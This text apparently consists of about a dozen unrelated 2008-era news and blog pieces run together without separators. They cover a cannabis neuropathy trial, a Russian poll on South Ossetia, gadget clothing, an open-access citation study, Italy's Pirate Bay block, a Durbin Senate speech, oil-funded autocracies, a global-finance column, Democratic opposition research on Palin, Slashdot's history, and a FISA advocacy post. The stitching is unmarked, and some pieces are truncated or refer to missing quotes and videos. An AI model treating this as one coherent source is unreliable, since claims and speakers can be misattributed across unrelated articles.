" Neuropathy is a chronic and significant problem in HIV patients as there are few existing treatments that offer adequate pain management to sufferers , " Ellis said .
" We found that smoked cannabis was generally well - tolerated and effective when added to the patient 's existing pain medication , resulting in increased pain relief . "
Each trial participant participated in five study phases over seven weeks .
During two five - day phases , randomly selected participants smoked either cannabis or placebo cigarettes made from whole plant material with cannabinoids ( the psychoactive compound found in marijuana ) removed , both provided by the National Institute on Drug Abuse .
Outcome was tested by standardized tests measuring analgesia ( lessened pain sensation ) , improvement in function and relief of pain - associated emotional distress .
Using verbal descriptors of pain magnitude , cannabis was associated with an average reduction of pain intensity from ' strong ' ' to mild - to - moderate ' in cannabis smokers , according to Ellis .
Also , cannabis was associated with a sizeable ( 46 % versus 18 % for placebo ) proportion of patients reporting clinically meaningful pain relief .
The study 's findings are consistent with and extend other recent research supporting the short - term efficacy of cannabis for neuropathic pain , also sponsored by the CMCR .
" This study adds to a growing body of evidence that indicates that cannabis is effective , in the short - term at least , in the management of neuropathic pain , " commented Igor Grant , M.D. , professor of psychiatry and director of the CMCR .
Source : University of California - San Diego
MOSCOW ( Reuters ) - Russians blame the United States and Georgia for triggering the conflict in Georgia ’s breakaway region of South Ossetia , with just one percent pointing the finger at Moscow , an opinion poll showed on Wednesday .
When asked who was guilty for the conflict in South Ossetia , 54 percent of those polled blamed Georgia and another 22 percent blamed the United States , a survey carried out by Russia ’s largest pollsters VTsIOM showed .
A further 12 percent said Russia , South Ossetia and Georgia were jointly responsible for the conflict , it said .
VTsIOM polled 1,594 respondents in 46 regions of Russia between August 10 - 13 , or from the height of the conflict until Wednesday .
The margin of error is 3.4 percent .
“ There is no significant difference in the views of Russians by age or education .
More or less all of society is united on this conflict in South Ossetia , ” Olga Kamenchuk , the communications director of VTsIOM , told Reuters .
The conflict was described as a full - scale war by 83 percent of those polled .
Eight percent of respondents called it a typical conflict of the volatile Caucasus region .
When asked what policy Russia should take , 57 percent of people said Russia should intervene , try to halt all military activity and urgently start peace negotiations .
A separate poll published on Tuesday by independent pollsters Levada found that almost half of Russians want South Ossetia to be integrated into Russia while a third believe it should be an independent country .
By JR Raphael
Contributing Writer , [ GAS ]
We may not be GQ , but we ’ve tracked down some new fashion items that we think will be a bit more exciting than the latest trendy threads .
See if you agree .
The Stink - Free Socks
Scientists are close to creating a kind of clothing that ’ll keep you smelling a little fresher .
The fabric actually has perfume - filled microcapsules to mask any offensive odors with a pleasant lemony scent .
They ’re working on suits , socks , and even underwear with the technology .
It ’s the same concept at work in scratch - and - sniff stickers , believe it or not , but this is the first time a skin - safe solution has been found .
So scratch away , dear readers — though we advise using caution with any direct sniffing .
The Marty McFly Sneakers
You may already own the orange vest , but now you can get the official Marty McFly Back to the Future shoes , too .
Inspired by the futuristic high - tops from the second installment of the series , Nike is releasing a new “ Hyperdunk ” line of sneakers this summer .
The shoes have a similar look and even come with the year “ 2015 ” on the front .
No auto - lace - up feature yet , though .
The Photo - Proof Glasses
Worried someone might snap an incriminating photo of you ?
Make yourself a pair of “ Anti-Paparazzi Sunglasses ” and fear no more .
The glasses come with a switch to turn on bright LED lights on the front , making your face virtually invisible to cameras .
The All - Seeing Jacket
If the glasses are n’t good enough , you can use the Hard - Wear Jacket to keep an eye on all sides of you .
The jacket comes with a built - in microcamera in the back and a tiny display screen on the sleeve so you can watch who might be following you .
Of course , with the popped - up collar and bright orange checker design , we imagine you ’ll find mainly people pointing and laughing behind you — but hey , at least you ’ll know they ’re there .
When academic articles are " open access " or free online , they get read more often , but they do n't -- going against conventional wisdom -- get cited more often in academic literature , finds a new Cornell study .
The reason , suggest Cornell graduate student Philip Davis and colleagues , including three Cornell professors , is that most researchers probably already have all the access they need to relevant articles .
" It appears that higher quality articles -- in other words , more citable articles -- are simply made freely available , " said Davis .
" Previous studies using different methods simply got cause and effect reversed . "
The study is published online in the British Medical Journal and will be published in the print edition Aug .
9 .
The findings are particularly relevant to academic researchers , because the frequency with which a researcher 's work is cited can be a factor in tenure and promotion decisions .
The researchers conducted the first controlled study of open - access publishing , randomly making some journal articles freely available while keeping others available by subscription only , to determine whether increased access to journal articles results in more article downloads and citations .
They found that in the year after the articles were published , open - access articles were downloaded more but were no more likely to be cited than subscription - based articles .
" The established dogma is that freely available scientific articles are cited more because they are read more , " said Davis , a former science librarian who designed the study .
" We found that open - access publishing may reach more readers than subscription - access publishing , but there is no evidence that freely accessible articles are cited any more than subscription - access articles . "
The researchers randomly assigned 247 articles in 11 scientific journals , to free access .
They measured how many times these articles were downloaded , the number of unique visitors to each article and how many times each article was cited .
" There were definitely more article downloads for freely accessible articles , " said Davis .
" Yet nearly half of these downloads were by Internet indexing robots like Google , crawling the Web for free content . "
" There are many reasons to provide free access to the literature , " said Davis .
" A citation advantage , however , is not one of them . "
Other co-authors are Bruce V. Lewenstein , professor of communication ; Daniel H. Simon , assistant professor of economics ; James G. Booth , professor of statistics ; and Matthew J.L. Connolly , programmer and analyst , all at Cornell .
The research was funded by the Andrew W. Mellon Foundation .
The Pirate Bay has been " censored " in Italy following an urgent decree from a deputy public prosecutor .
Pirate Bay's IPs and the domain name are inaccessible , as they are blocked by ISPs all over the country .
Whether these blocks will be very effective , however , is doubtful , since The Pirate Bay has already announced several countermeasures .
An insider working at an Internet provider in Italy told TorrentFreak that all the relevant large access ISPs in Italy have complied with the request to block the popular BitTorrent tracker , which was sent out yesterday .
Italy is taking a stand against BitTorrent sites , so it seems .
Two weeks ago , the largest Italian torrent site , Columbo - BT , was shut down by the same prosecutor who is responsible for the Pirate Bay block .
IFPI , the infamous anti-piracy organization assisted the prosecutor , and it would n’t be a surprise if they assisted in this case as well , considering their history with The Pirate Bay .
In a response to the news , Pirate Bay co-founder Peter Sunder told TorrentFreak that they have already implemented countermeasures to make sure all Italians will be able to access their site .
“ We ’re working on setting up a really annoying system for them to filter , ” he said .
“ Some of the ISPs decided to nullroute – so we changed IP so it works for them now some other decided to block the domain name so we added labaia.org , which means “ the bay ” in Italian . ”
As usual , the popular BitTorrent tracker is not going down without a fight , and The Pirate Bay team is determined to keep the site accessible to all Italians .
They will also contact the prosecutor , and they invite Italian lawyers who know how to counter this legally , to contact them .
“ We ’re quite used to fascist countries not allowing freedom of speech .
A lot of smaller nations that have dictators decide to block our site since we can help spread information that could be harmful to the dictators , ” Sunde wrote in a blog entry .
This is not the first time that ISPs were forced to block access to The Pirate Bay .
In February , a Danish court ordered the ISP “ Tele 2 â €³ to block its customers from accessing the site .
The decision , which is currently under appeal , once again heated the debate on ISPs Internet filtering .
This Danish court case was initiated by the IFPI , that later tried to use the “ landmark decision ” to force Swedish ISPs to do the same , but failed .
In fact , it seems that filtering traffic to The Pirate Bay is actually illegal according to European law , and it is highly doubtful that the block in Italy is lawful .
Sunde has his suspicions about the reason for the block , he told us : “ It ’s quite funny that the country Italy is run by the biggest media mogul of them all .
we ’re his competitors . ”
Whether or not Berlusconi was personally involved , blocking The Pirate Bay is doomed to fail , and will only strengthen the popularity of the site in Italy .
developing story … updates soon .
" It 's unfortunate and it 's wrong .
It is wrong to require 60 percent of this body to vote this way if traditionally on this war in Iraq we 've required only a simple majority .
I suppose it 's encouraging to us that more than 60 percent of the American people get it .
They understand how failed this policy has been of the Bush Administration , the policy that 's being supported by the Minority Leader of the United States Senate .
" They understand it .
They want us to do something about it .
But the Senator from Kentucky has thrown this obstacle in our path .
he has created this procedural roadblock .
He has filibustered -- starting a filibuster to stop the debate on the war in Iraq . "
" One of the critics of this recently called it a stunt , a stunt that we would stay in session .
A stunt that we would have a sleepless night for Senators , a stunt that we would inconvenience senators and staff and press and those who follow the proceedings .
I do n't think it 's a stunt .
I think it reflects the reality of this war .
" How many sleepless nights have our soldiers and their families spent waiting to find out whether they 'll come home alive ?
How many sleepless nights have they spent praying that after the second and third redeployment that their soldier will still have the courage and strength to beat back the enemy and come home to his family ?
It 's about time for the Senate to spend at least one sleepless night .
Maybe it 's only a symbol but it's an important symbol for the soldiers and families . "
Assistant Democratic Leader Dick Durbin of Illinois took to the floor of the Senate yesterday afternoon and gave a wonderful speech in which he went after the GOP leadership for how ridiculously difficult they 've made it for Democrats to change course in Iraq as the American people have demanded .
Here 's Durbin talking about how Senate Republicans , by filibustering everything that comes before the body , have created their own reality of a 60 - vote majority being required to pass anything , despite the fact that the Senate does n’t actually conduct its business like that :
And Durbin lashed the Republicans for calling the Democratic plan to shock the GOP back to reality a " stunt " rather than accepting the shame that should come from pushing the Senate to this point :
Have a look at a video clip that has much of Durbin 's speech :
About this series
This is the second in a series of occasional stories looking at how skyrocketing oil prices are transforming lives in Southern California and around the world .
--
The boom in world oil prices is bolstering autocratic governments in a handful of petroleum - rich countries , emboldening them to challenge U.S. objectives and weakening their own democratic movements .
Advertisement
The cost of a barrel of oil has climbed dizzyingly , from $ 80 in September to more than $ 147 , before settling Wednesday at $ 134.60 .
Some analysts expect it to continue rising to $ 200 .
The effects are visible across the globe :
Iraq ’s warring factions are scrapping for a share of the massive oil wealth .
The Sudanese government has more money to spend on military equipment and the campaign against rebels in Darfur .
Saudi Arabia has grown more distant from its allies in Washington .
But some of the most obvious effects are in countries whose leaders are most hostile to the United States : Venezuela ’s populist President Hugo Chavez , Iran ’s stringent Islamic rulers and Russia ’s growing autocracy .
The governments of these three countries , among the top eight in proven reserves , are demanding a greater role in world affairs while spending on domestic social programs , raising salaries and building infrastructure -- measures that help blunt concerns over a slide into greater authoritarianism .
Advertisement
“ You have no control from society or opposition or the state or anybody , ” said Grigory Yavlinsky , a Russian economist and leader of the opposition Yabloko party .
“ So it ’s easy to use this money to support your popularity . ”
But vast oil wealth comes with risks .
All three countries are struggling with inflation , which might slowly erode popular support .
In Russia , public spending doubled from 2004 to 2007 .
Oil and gas revenues are expected to surpass $ 178 billion in 2008 , nearly $ 33 billion more than originally projected .
The International Monetary Fund , wary of inflation , has warned Russia against rampant spending .
Inflation in Iran has aggravated a devaluation of the currency .
Advertisement
Political changes wrought by the oil windfall also may backfire .
Venezuela ’s output is declining in part because skilled engineers and foreign companies are fleeing .
Analysts say sanctions , brain drain and dearth of foreign investment have badly hurt Iran ’s potential output because of a lack of modern techniques .
For now , however , all three are riding high on oil revenue .
“ This is perhaps the largest shift of wealth and resources in the history of the world economy , ” said Andrei Illarionov , who was an economic advisor to former Russian President Vladimir Putin and is now a senior fellow at the Cato Institute .
“ This money happens to be a kind of windfall profit for these countries , compensating for failures in other areas . ”
A nine - year run of growing oil revenue has restored Russia to a strength it has n’t experienced since the Soviet heyday .
No longer a broken country fumbling for footing , Russia is now a major player on the world stage .
Advertisement
Ten years ago , Russia was swamped with debt .
Today , it sits on the world ’s third - largest monetary reserves , topped only by China and Japan .
The government has unveiled popular initiatives to boost pensions and improve benefits for veterans .
New President Dmitry Medvedev promised to focus on socioeconomic woes that beset ordinary Russians .
Meanwhile , Moscow has become increasingly aggressive toward Western - leaning former Soviet states , imposing a blockade on Georgia and engaging in a dispute with Ukraine over the pricing of natural gas .
Putin has sparred with the United States over NATO expansion ; U.S. plans to install missile defense radar and rockets in Poland and the Czech Republic ; and recognition of Kosovo ’s independence .
Advertisement
Russia has also boosted ties with Iran , building a nuclear power plant in the city of Bushehr and providing nuclear fuel -- even as Iran ’s nuclear program has emerged as a source of acrimony with the West .
Medvedev recently charged that incompetence and arrogance by Washington and U.S. businesses have provoked a global economic crisis .
“ It was the disconnect between the formal role played by the United States of America in the world economic system and its actual capabilities that was one of the main reasons for the current crisis , ” Medvedev told political and business leaders at the St. Petersburg International Economic Forum .
“ Russia today is a global player , ” Medvedev said .
“ We must recognize its responsibility for shaping the destiny of the world . ”
Advertisement
Russians have embraced this vision , and Putin and Medvedev enjoy strong popularity .
But the country also suffers from rampant corruption and a focus on quick profits .
Independent media have been squashed and dissent is being silenced .
Beyond the new class of super - rich nourished by oil and gas prices , widespread poverty lingers .
And in the first four months of 2008 , oil output decreased 1.5 % compared with the same period in 2007 .
There are fears that rising costs and aging fields mean output could decrease this year for the first time in a decade .
Iran too has experienced an increase in clout and a weakening of democracy as the price of oil has risen .
The Islamic Republic has been able to simultaneously expand its influence , bolster military capability and suppress dissent .
Since the 1979 Islamic Revolution , the price per barrel has played a critical role in determining the tone of relations between the U.S. and Iran , which is heavily dependent on energy exports to finance its gigantic public sector , its military and its foreign allies .
Advertisement
In the 1990s , with oil prices bottoming out and foreign debt piling up , Iran was forced to moderate its domestic and international policies to attract European investment and trade with Persian Gulf states .
With oil at an inflation - adjusted $ 24 a barrel and dropping , reformist Mohammad Khatami was elected president with a mandate to make Iran a more open country .
But by 2002 , with oil at $ 27 and rising , analysts detected a drift toward greater authoritarianism , including a crackdown on the independent media and the arrests of dissidents and members of Khatami ’s entourage .
With oil at $ 55 a barrel , conservative President Mahmoud Ahmadinejad ascended to power in 2005 .
Record oil prices have enabled Ahmadinejad to offer low - interest loans or food coupons to government supporters , launch infrastructure projects and import large amounts of food to keep commodity prices low .
Meanwhile , journalists , activists and bloggers are silenced by intimidation or jailing .
Advertisement
Tehran earned more from oil money in May 2008 than it did in all of 1998 , the height of Khatami ’s power .
Iran ’s nuclear program has become one of the major foreign policy worries of the Bush administration and Israel , as well as a grave concern for Europe and the Arab world .
Iranian backing for militant groups in the Palestinian territories and Lebanon did not begin with the oil boom .
But its strong role in Iraq , along with the rapid expansion of its uranium enrichment program over the last two years , did .
“ You ca n’t attribute that entirely to higher oil prices , ” said Paul Sampson , a London - based analyst for Energy Intelligence , a trade publisher covering the oil and gas industries .
But “ the fact is that the hard - liners have become more entrenched because they have this constant stream of oil revenue . ”
Advertisement
“ As a general rule in Iran , the increase of oil price has disproportional relationship to democratization , ” said Said Laylaz , a Tehran economist .
“ The higher the price , the less democratic society .
. . .
The government has been emboldened to control everything . ”
High oil prices have also shielded Iran from the effects of sanctions over its nuclear program .
“ If you took Iran ’s oil off the market , that would bring the international economy to its knees , ” Sampson said .
“ Iran knows that . ”
In Venezuela , the Central Bank reports that oil revenue for the first quarter of this year was $ 20 billion , up 60 % from the first three months of last year .
Advertisement
Chavez has channeled much of the oil bonanza into programs for the poor .
But observers worry that the windfall is encouraging his autocratic tendencies , and that Chavez is using the cash to finance an arms buildup and an anti-U.S. policy initiative .
Others predict that in a country where 70 % of economic output is directly related to oil , his economic model will crash if and when prices fall .
Growth is evident everywhere in Venezuela , in shopping malls where consumers snap up clothing , whiskey and electronics , and on streets where traffic jams tell of a 47 % increase in car sales last year .
For now , it matters little that production has sharply declined over the last five years because of the flight of home - grown professionals and the foreign firms with expertise in dealing with Venezuela ’s difficult - to - handle heavy oil .
Advertisement
But some say rising oil prices mask economic troubles to come .
Gustavo Garcia , an economist at a Caracas think tank and graduate school known by its initials , IESA , said growth such as Venezuela ’s that is based on high oil prices cannot be maintained indefinitely .
“ In the medium term , when these prices return to normal levels , the economy will be subject to a traumatic adjustment , ” he said .
“ We are repeating cycles of past economic expansions that were based on oil booms that are n’t sustainable . ”
--
Advertisement
megan.stack@latimes.com
daragahi@latimes.com
Stack reported from Moscow and Daragahi from Beirut .
Times staff writer Chris Kraul in Bogota , Colombia , and special correspondent Ramin Mostaghim in Tehran contributed to this report .
Submitted by cpowell on Mon , 2008-07-21 02:51 .
By Ambrose Evans - Pritchard
The Telegraph , London
Sunday , July 20 , 2008
http://www.telegraph.co.uk/money/main.jhtml?xml=/money/2008/07/21/ccview...
It feels like the summer of 1931 .
The world 's two biggest financial institutions have had a heart attack .
The global currency system is breaking down .
The policy doctrines that got us into this mess are bankrupt .
No world leader seems able to discern the problem , let alone forge a solution .
The International Monetary Fund has abdicated into schizophrenia .
It has upgraded its 2008 world forecast from 3.7 percent to 4.1 percent growth , whilst warning of a " chance of a global recession . "
Plainly , the IMF cannot or will not offer any useful insights .
Its " mean - reversion " model misses the entire point of this crisis , which is that central banks have pushed debt to fatal levels by holding interest too low for a generation , and now the chickens have come home to roost .
True " mean - reversion " would imply debt deflation on such a scale that would , if abrupt , threaten democracy .
The risk is that these same central banks will commit a fresh error , this time overreacting to the oil spike .
The European Central Bank has raised rates , warning of a 1970s wage - price spiral .
Fixated on the rear - view mirror , it is not looking through the windscreen .
The eurozone is falling into recession before the US itself .
Its level of credit stress is worse , if measured by Euribor or the iTraxx bond indexes .
Core inflation has fallen over the last year from 1.9 to 1.8 percent .
The US may soon tip into a second leg of this crisis as the fiscal package runs out and Americans lose jobs in earnest .
US bank credit has contracted for three months .
Real US wages fell at almost 10 percent ( annualised ) over May and June .
This is a ferocious squeeze for an economy already in the grip of the property and debt crunch .
No doubt the rescue of Fannie Mae and Freddie Mac -- $ 5.3 trillion pillars of America 's mortgage market -- stinks of moral hazard .
The Treasury is to buy shares : the Fed has opened its window yet wider .
Risks have been socialised .
Any rewards will go to capitalists .
Alas , no Scandinavian discipline for Wall Street .
When Norway 's banks fell below critical capital levels in the early 1990s , the Storting authorised seizure .
Shareholders were stiffed .
But Nordic purism in the vast universe of US credit would court fate .
The Californian lender IndyMac was indeed seized after depositors panicked on the streets of Encino .
The police had to restore order .
This was America 's Northern Rock moment .
IndyMac will deplete a tenth of the $ 53 billion reserve of the Federal Deposit Insurance Corporation .
The FDIC has some 90 " troubled " lenders on watch .
IndyMac was not one of them .
The awful reality is that Washington has its back to the wall .
Fed chief Ben Bernanke thought the US could always get out of trouble by monetary stimulus " a l'outrance , " and letting the dollar slide .
He has learned that the world is a more complicated place .
Oil has queered the pitch .
So has America 's fatal reliance on foreign debt .
The Fannie / Freddie rescue , incidentally , has just lifted the US national debt from German AAA levels to Italian AA - levels .
China , Russia , petro-powers , and other foreign states own $ 985 billion of US agency debt , besides holdings of US Treasuries .
Purchases of Fannie / Freddie debt covered a third of the US current account deficit of $ 700 billion over the last year .
Alex Patelis from Merrill Lynch says America faces the risk of a " financing crisis " within months .
Foreigners have a veto over US policy .
Japan did not have this problem during its Lost Decade .
As the world 's supplier of credit , it could let the yen slide .
It also had a savings rate of 15 percent .
Albert Edwards from Societe Generale says this has fallen to 3 percent today .
It has cushioned the slump .
Americans are under water before they start .
My view is that a dollar crash will be averted as it becomes clearer that contagion has spread worldwide .
But we are now at the point of maximum danger .
Britain , Japan , and the Antipodes are stalling .
Denmark is in recession .
Germany contracted in the second quarter .
May industrial output fell 6 percent in Holland and 5.5 percent in Sweden .
The coalitions in Belgium and Austria have just collapsed .
Germany 's left - right team is fraying .
One German banker told me that the doctrines of " left Nazism " ( Otto Strasser 's group , purged by Hitler ) had captured the rising Die Linke party .
The Social Democrats are picking up its themes to protect their flank .
This is the healthy part of Europe .
Further south , we are not far away from civic protest .
BNP Paribas has just issued a hurricane alert for Spain .
Finance minister Pedro Solbes said Spain is facing the " most complex " economic crisis in its history .
Actually , it is very simple .
The country was lulled into a trap by giveaway interest rates of 2 percent under EMU , leading to a current account deficit of 10 percent of GDP .
A manic property bubble was funded by foreigners buying covered bonds and securities .
This market has dried up .
Monetary policy is now being tightened into the crunch by the ECB , hence the bankruptcy last week of Martinsa - Fadesa ( E5.1 billion ) .
With Franco - era labour markets ( 70 percent of wages are inflation - linked ) , the adjustment will occur through closure of the job marts .
China , India , east Europe , and emerging Asia have all stolen growth from the future by condoning credit excess .
To varying degrees , they are now being forced to pay back their own " inter - temporal overdrafts . "
If we are lucky , America will start to stabilise before Asia goes down .
Should our leaders mismanage affairs , almost every part of the global system will go down together .
Then we are in trouble .
* * *
Join GATA here :
Hard Assets Investment Conference
Tuesday - Wednesday , September 9 - 10 , 2008
Mandalay Bay Resort and Casino , Las Vegas , Nevada
http://www.iiconf.com/
* * *
Help Keep GATA
Going
GATA is a civil rights and educational organization based in the United States and tax - exempt under the U.S. Internal Revenue Code .
Its e-mail dispatches are free , and you can subscribe at http://www.gata.org/.
GATA is grateful for financial contributions , which are federally tax - deductible in the United States .
Democrats are zeroing in on an ongoing probe into Palin ’s role in the firing of the state ’s public safety director , who had reportedly refused to sack Palin ’s estranged former brother - in - law .
Dems armed with Palin opposition
Sarah Palin may be a complete stranger to most of the American public , but there ’s an important subset of the population that ’s doubtless already very familiar with John McCain ’s surprise vice presidential pick : Democratic opposition researchers .
While the central line of attack looks to be her inexperience — and , by extension , her running mate ’s age , there are other hits to come .
Advertisement
In a state whose politics have been defined of late by oil scandals , Dems will no doubt seek to link her to scandals involving indicted Sen .
Ted Stevens ( who offered an endorsement of her Friday ) and Rep. Don Young .
She ’s also clashed with McCain over Arctic drilling — she wants drilling in the Arctic National Wildlife Refuge , which he has continued to oppose .
But most of all , Democrats are zeroing in on an ongoing probe into Palin ’s role in the firing of the state ’s public safety director , who had reportedly refused to sack Palin ’s estranged former brother - in - law .
Audiotapes released last month reveal that aides to the 44 - year - old governor pressured Safety Director Walter Monegan to dismiss Trooper Mike Wooten , after Wooten allegedly threatened Palin ’s father during a messy child custody fight with the governor ’s sister Molly .
Monegan refused to do so and was fired on July 11 and replaced by an official who had previously been suspended for sexual harassment .
Palin said Monegan was let go for failing to fill trooper vacancies and invited a close examination of her role in the matter .
The Alaska state legislature obliged , allocating $ 100,000 to investigate .
The results of the probe are expected on Oct. 31 , less than a week before the general election .
But Troopergate II is n’t the only issue Democrats are pushing .
They are going straight after Palin ’s perceived strengths : ethics and good government .
Palin , who when she became governor sold Gov. Frank Murkowski ’s state - owned jet and canceled Stevens ’ much - maligned “ bridge to nowhere , ” was also a vocal critic of oil field services giant Veco , a major player in Alaska politics that 's now accused of improper relationships with Stevens and Young .
According to an Anchorage Daily News clip e-mailed to reporters , Palin accepted $ 5,000 in contributions from company executives and their wives during her failed 2002 lieutenant governor ’s bid — which represented about 10 percent of her minuscule war chest that year .
" Now we can talk about Ted Stevens and Don Young and Republican corruption every day , " said a delighted Democratic strategist .
" That 's great for us . "
But Republican Rep. Candice Miller , who represents Macomb County , Mich. , considered a bellwether swing district , said the ferocity of the Democrats ’ efforts reflect fear of a candidate who can seriously challenge them among working - class women .
“ Democrats are scared ; they are having a meltdown , ” said Miller , who was planning to skip the GOP convention next week before Palin was announced .
“ They ’d better do their opposition research as fast as they can , because they only have a couple of days to find something on her before she takes over that convention . ”
Other nuggets Democrats hope reporters will mine over the next two months :
— Palin did n’t back McCain in the primary .
She stayed neutral in Alaska ’s January primary — perhaps on account of McCain ’s opposition to drilling in ANWR .
“ A lot of us are sitting back and waiting to see if there will be new players in there , " she said in 2007 .
" That ’s probably why that box that says ‘ none of the above ’ is so popular right now . "
— Mayoral performance .
Palin , who portrays herself as a fiscal conservative , racked up nearly $ 20 million in long - term debt as mayor of the tiny town of Wasilla — that amounts to $ 3,000 per resident .
She argues that the debt was needed to fund improvements .
— Stevens and Young , redux .
Palin has distanced herself from the state ’s two most popular politicians , but both appeared at Palin fundraisers during her 2006 gubernatorial bid .
— The environment .
As governor , Palin vetoed wind power and clean coal projects , including a 50 - megawatt wind farm on Fire Island and a clean coal facility in Healy that had been mired in a dispute between local and state governments .
— And , maybe , censorship .
According to the Frontiersman newspaper , Wasilla ’s library director , Mary Ellen Emmons , said that Palin asked her outright if she " could live with censorship of library books . ”
Palin later dismissed the conversation as a “ rhetorical ” exercise .
In 1997 , the name Slashdot was cool , because most people really were n't familiar with the idea of web addresses : we 'd tell them to go to " slash slash slash - dot dot org " and their eyes would glaze over .
The /. site was pretty cool , too .
It was billed as " News for Nerds " and the net had a very high proportion of nerds back then .
What it did n't have was a plethora of blogs where someone could post a short story with a link so that thousands of people could pile in and discuss it .
But at the time , I thought of Slashdot more as a replacement for Usenet newsgroup discussions than a precursor of blogging .
Either way , Slashdot soon became so popular that it gave rise to " the Slashdot effect " .
Slashdotters would see a new user - submitted story and click the link , and the target site would promptly collapse under the sheer weight of visitors .
Sites that carried stories about Linux and open source , and geeky science news , usually had n't been set up to handle huge spikes in traffic .
Naturally , many people tried to exploit the Slashdot effect , including me .
There was no quicker way to get noticed .
Unfortunately , one of the downsides of nerdy sites is that they attract loads of nerds .
These are the people who do n't have girlfriends or proper jobs ; who live on pizza in their parents ' basement , and rarely see the sun ; who have an encyclopedic knowledge of Star Wars but no common sense .
It 's a running gag on Slashdot that everyone is like that , even though they 're not .
Slashdot 's standard nerd hypocrisy is another running gag .
Everyone knows that anything related to Apple / Linux / open source is innovative and cool , whereas if Microsoft had done exactly the same thing , it would be evil and monopolistic .
Double standards rule .
But unlike Usenet , Slashdot has an innovative and cool Karma system to bury a lot of the rubbish .
Comments are labelled ( flamebait , troll , redundant , insightful , interesting , informative , funny etc ) and rated , and Slashdotters can vote them up or down .
The perceptive comments should therefore get voted up to +4 or +5 while the stupid ones are voted down to - 1 .
If you browse Slashdot with a threshold set at +3 , you can read the best and ignore the rest .
The good stuff on Slashdot is still very good , but perhaps the site is past its best .
Although it has expanded beyond the nerd ghetto into politics and YRO ( Your Rights Online ) , the site has been superseded by newcomers such as Digg and Reddit , Techmeme and Tailrank and other sources of news links .
Slashdot 's responses to this competition – which include Idle and Firehose – do n't seem to have the same sort of momentum .
Any site that has signed up more than a million members and has several million visitors a month is clearly getting lots of things right .
It 's still the primary place for nerds to discuss news .
However , as the internet grows , the proportion of nerds declines , and so does Slashdot 's relative importance .
“ Those who can give up essential liberty to purchase a little temporary safety deserve neither liberty nor safety . ”
– Benjamin Franklin
Trouble viewing ?
Click here .
[ Note : The vote was postponed from Tuesday ( today ) to tomorrow , Wednesday .
There is still time to take the actions below . ]
This is the most important and controversial post I ’ve ever written .
For American readers , the short video above could be the most important video you watch in your lifetime .
I hesitated to post this and will alienate some readers , but I accept that .
Wednesday , July 9th , could mark the beginning of official condoning of warrantless surveillance of law - abiding citizens in the US , not to mention foreign nationals .
I am not an alarmist and believe in qualified surveillance with process — this is different .
I ’ve done the homework .
The above is an 18 - minute interview that I just finished with Daniel Ellsberg , famous for releasing the Pentagon Papers to the New York Times in 1971 .
His actions are often credited with helping end not only the Nixon presidency but also the Vietnam War .
He consulted for the Kennedy Administration after receiving a PhD. from Harvard in Economics and served in the Pentagon under Secretary of Defense Robert McNamara .
Remember that part of lifestyle design is creating a good environment for you and those you care for .
Central to this is preventing dangerous laws — the rules of your environment — from coming into existence .
This is not about being political .
It ’s about being responsible .
There are Republicans in Congress who oppose this bill , so it should n’t be written off as leftist propaganda .
In the video above , I interview Ellsberg to learn what every American needs to know — and do in the next 24 hours — about the new FISA ( Foreign Information and Surveillance Act ) amendments .
The interview , and below partial transcription , answers questions like …
- I do n’t have anything to hide .
How does this affect me ?
- What if this type of surveillance is what has prevented another 9/11 from happening ?
- What are common inaccuracies about FISA reported in the media ?
Please watch it .
Find below how you can make a real impact in less than 60 seconds .
Every person counts — the Senators who will vote are watching the numbers .
41 Senators can block the bill , and it ’s not too late .
Please do the following .
How I ask you to spend 60 seconds
Daniel explains below several important reasons to act in the next few hours ( much more in the video ) , but for those who are prepared to spend 60 seconds to help protect their liberties and prevent warrantless wiretapping from becoming a new standard in the US , here are two options :
1. ALL AMERICANS : Go to the EFF website here and put in your zipcode to find your Senator ’s phone number .
Call them and read the short script on the same page .
If no answer or a full voicemail box , click the link at the bottom of the page to e-mail them .
( Tell others verbally to go to “ www.eff.org” and click “ take action ” )
2. OBAMA SUPPORTERS : Go to My.BarackObama.com here and join the group requesting he oppose ( as he did earlier ) the amendment .
This takes about 30 seconds .
I suggest changing “ ListServ ” in the bottom right to “ Do not receive e-mails . ”
( Tell others verbally to search “ obama please vote no ” on Google and My.BarackObama.com will be in the top 3 results , currently # 1 )
I would love to give online Facebook - like groups for all Republicans , especially McCain , and Democrats who originally opposed the bill , but Obama is the only Senator I can find with a group to join specifically related this FISA bill .
Two Tips from a Former Pfizer Lobbyist and Fellow Reader
Credit and thanks to “ Roger Dodger ” :
1 ) When you call your Senators , ask then where they stand on the bills before reading the script .
If they are with you on most issues , thank them !
Then ask why they do n’t support the issues you differ on .
Then go on to ask for their support on those issues .
If they are against you in most things , then refer to the entire script .
2 ) If they get enough calls , they will change their minds on an issue .
10 activists saying an issue is important to them may equal the opinion of 10000 constituents .
If you do n’t believe that , just talk to any Real Estate Developer in your area and listen to their war stories on how 10 people coming to a community meeting and shouting blocked a multi million dollar project from happening .
Be nice .
And be interested in the person on the other end of the line .
These people have nutjobs calling all day to scream at them .
I was amazed at how uninformed people in Congress ( not just the elected , but their staff as well ) were on issues .
I was talking heathcare with them and in most cases , ten months after passing the Medicare Part D , I was the first person who they ’d talked to who had interviewed doctors on how they felt Part D was working .
Inform your Congress on issues you are interested in !
Some Highlights with Daniel Ellsberg
1 . Why does the vote this Tuesday , July 8th matter to normal people who have nothing to hide ?
Ordinary citizens who want to live in a democracy — including those with nothing to hide — should be concerned about the ability of the government to use private , sensitive personal information to blackmail , manipulate , and intimidate their representatives , journalists and their sources , potential whistleblowers , and activists or dissenters of any sort .
2. Could n’t it be argued that this type of surveillance ability has prevented another 9/11 from happening ?
Is n’t it possible that this type of legislation has saved American lives ?
The administration has claimed that is has , but without presenting a single piece of evidence that this is so , even in closed hearings to Senators with clearances on the Intelligence Committee .
The FISA court has granted warrants in virtually every request that ’s been made of it that has any color of helping national security .
The administration ’s decision to bypass that court , illegally , leads to a strong suspicion that they are abusing domestic spying , as some of their predecessors did , in ways that even the secret FISA court would never approve .
3 . What are the most important factual inaccuracies about FISA found in the media ?
Advocates of the bill take pride that it makes this amended FISA the exclusive basis for overhearing citizens , but that exclusivity is , in fact , in the current 30 - year - old FISA bill already .
President Bush simply ignored it in bypassing FISA , and there ’s not reason that he and his successors would not continue to do the same here .
It ’s been inaccurately stated that if this amendments did n’t pass , FISA would expire .
This is flatly false .
FISA is open - ended and will continue as it already has , adequately for 30 years .
What would expire are some blanket surveillance orders authorized last year , which the majority of Democrats , including Senator Obama , voted against .
The current bill does include one useful amendment to FISA , which could be passed with virtually unanimous approval in an afternoon , to allow warrantless interception of foreign - to - foreign communications that happen to pass through the United States .
No one opposes this .
